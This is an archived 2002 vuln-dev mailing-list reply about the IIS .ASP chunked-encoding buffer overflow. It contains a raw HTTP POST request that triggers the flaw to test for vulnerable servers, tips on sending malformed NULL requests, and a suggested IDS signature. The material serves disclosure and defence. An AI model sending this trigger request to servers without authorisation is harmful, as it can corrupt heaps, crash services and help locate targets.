Re: IIS .ASP Remote Buffer Overflow [testing for vulnerable installations]
From: Riley Hassell (rhassell@eeye.com)Date: 04/13/02
- Previous message: dullien@gmx.de: "Re[2]: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow"
- In reply to: dullien@gmx.de: "Re[2]: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow"
- Next in thread: 3APA3A: "Re[2]: IIS .ASP Remote Buffer Overflow [testing for vulnerable installations]"
- Next in thread: InterceptiX Security: "Re: Re[2]: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow"
- Next in thread: incubus: "RE: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow"
- Reply: 3APA3A: "Re[2]: IIS .ASP Remote Buffer Overflow [testing for vulnerable installations]"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Riley Hassell" <rhassell@eeye.com> To: <vuln-dev@securityfocus.com> Date: Fri, 12 Apr 2002 15:15:47 -0700
If you want to test that an IIS4 or 5 server is vulnerable remotely you use
one of the following methods.
The request needs to be correct according to RFC.
Send this request:
"POST /iisstart.asp HTTP/1.1\r\n"
"Accept: */*\r\n"
"Host: eeye.com\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Transfer-Encoding: chunked\r\n"
"\r\n"
"1\r\n"
"E\r\n"
"0\r\n"
"\r\n"
"\r\n"
"\r\n"
It won't overwrite anything mission critical so the dllhost shouldn't lock
up or exit. If you're vulnerable then you'll the following string in the
error message "(0x80004005)<br>Unspecified". When a server is patched it
will respond with a new error, I believe it's (0x80004005)<br>Request...
You can also try putting NULL's in strange places in you request. The rollup
fixes a problem in parsing requests with NULLs. When IIS see's something
invalid in a request it will error back with "parameter incorrect", on an
unpatched system the responses will vary.
IDS Sig:
As far as an IDS signature, you guys can check for the existence of
"Content-Type: application/x-www-form-urlencoded\r\n" and
"Transfer-Encoding: chunked\r\n". These two tags can be switched around a
little so there has to be a certain level of logic available to the IDS.
Beyond that the chunking section can changed around so it can't be used. The
default file isn't really a possibility, an attacker can scan a server
remotely for pages that have the necessary ASP tags ;)
Riley Hassell
Security Research Associate
eEye Digital Security
Get up...
and light the world on fire.
----- Original Message -----
From: <dullien@gmx.de>
To: "MadHat" <madhat@unspecific.com>
Cc: "Erik Parker" <eparker@mindsec.com>; "'Marc Maiffret'" <marc@eeye.com>;
"Vuln-Dev" <vuln-dev@securityfocus.com>
Sent: Friday, April 12, 2002 10:25 AM
Subject: Re[2]: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow
> Hey all,
>
> M> I have not been able to reproduce these results. I have managed to
lock
> M> up IIS (IIS 5.0 with all patches pre Apr 1, 2002), but no popup
messages
> M> appear and no entries in the Application Log. I have also been able
get
> M> the 100 Continue message (IIS 4.0 all patches pre Apr 1, 2002), but
> M> still no popup or messages.
>
> rule of thumb : It locks up <==> Heap is corrupted <==> vulnerable
>
> Cheers,
> dullien@gmx.de
>
> --
> Mit freundlichen Grüssen
> dullien@gmx.de mailto:dullien@gmx.de
>
>
- Previous message: dullien@gmx.de: "Re[2]: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow"
- In reply to: dullien@gmx.de: "Re[2]: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow"
- Next in thread: 3APA3A: "Re[2]: IIS .ASP Remote Buffer Overflow [testing for vulnerable installations]"
- Next in thread: InterceptiX Security: "Re: Re[2]: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow"
- Next in thread: incubus: "RE: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow"
- Reply: 3APA3A: "Re[2]: IIS .ASP Remote Buffer Overflow [testing for vulnerable installations]"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
